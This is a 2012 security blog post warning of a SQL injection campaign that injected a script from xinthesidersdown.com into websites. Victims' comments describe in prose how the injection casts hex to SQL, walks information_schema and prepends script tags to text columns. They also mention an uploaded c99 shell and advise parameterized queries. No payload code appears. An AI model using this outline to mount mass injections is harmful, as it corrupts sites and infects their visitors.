Wednesday, 1 August 2012

xinthesidersdown.com injection attack in progress

There is currently an injection attack using a script pointing to [donotclick]xinthesidersdown.com/sl.php  doing the rounds. The malicious code is hosted on 194.28.115.150, the same IP address as used in this attack yesterday.

10 comments:

  1. We are using Absolute Banner Manager to show banner ads on our website. This xinthesidersdown crap hacked our banner manager last night and destroyed our ads. When I log into the banner manager, my antivirus pops up saying a threat has been detected and shows me this xinthesidersdown.com/sl.php as the attacker. What do I do about this?

    ReplyDelete
  2. This comment has been removed by the author.

    ReplyDelete
  3. A site I manage got hit. Looks like a bot views your home page, tries every link with a querystring, replacing each variable with an obfuscated script.

    The script casts a hex value to a varchar, which becomes a script that is executed.

    The script cursors over information_schema, gets all tables and columns of varchar, nvarchar, text and ntext, of size > 30.

    It then loops, and updates each table/column it finds with your existing text, prepended with a close title tag, the script tag, then an html comment block.

    ReplyDelete
  4. Check your databases/tables. It possibly has replaced all the text/varchar fields contents with the html you are seeing.

    We had to restore our DB's then put a fix in to stop this type of hack.

    ReplyDelete
  5. What kind of fix can you install to stop this attack?

    ReplyDelete
  6. Stevey,

    How is the attack done, and what kind of fix you have done.

    ReplyDelete
  7. There is a decent explanation of the attack here: http://stackoverflow.com/questions/11751636/searching-logs-for-sql-injection

    The attacker uses the CAST function to add malicious SQL code to the end of a query string, which gets executed by SQL Server. Some suggest to search for the term "CAST" in your website logs, but so far, I have not been able to find that term, or any record of any compromised query strings. Are there any other suggestions out there as to how to find the page, or the query string that the hacker is using to inject the malicious code?

    Thanks!

    ReplyDelete
  8. This comment has been removed by the author.

    ReplyDelete
  9. A website I manage got hit on August 1st too. We use ASP, ASP.NET and SQL Server as most of the people I found to be attacked by this malware network.

    Actually, we've detected a minor attack on the week before, coming from an USA IP (98.88.189.164). They've got into the FTP and slipped some files (including c99.txt). This allows RFI (Remote File Inclusion) and I don't really know if this was only a step for the August 1st attack, or just coincidence. They've messed up the FTP doing random stuff (such as deleting some files) and tried to look for log files. I've got really annoyed to read the 30k-line log...

    On July 31st we've been attacked by "lasimp04risoned.rr.nu" malware. It affected FTP files and database. On the next day, the database changed from "lasimp04risoned.rr.nu" to the "xinthesidersdown" one.

    We've restored the whole FTP and database, generated new strong passwords, and blocked ".rr.nu" address.

    Take good care of those querystrings...

    ReplyDelete
  10. Tom, the only way to prevent attacks like this is to properly code the .NET application to use parameterized queries instead of fully dynamic SQL when creating the queries which are sent to the SQL Server.

    ReplyDelete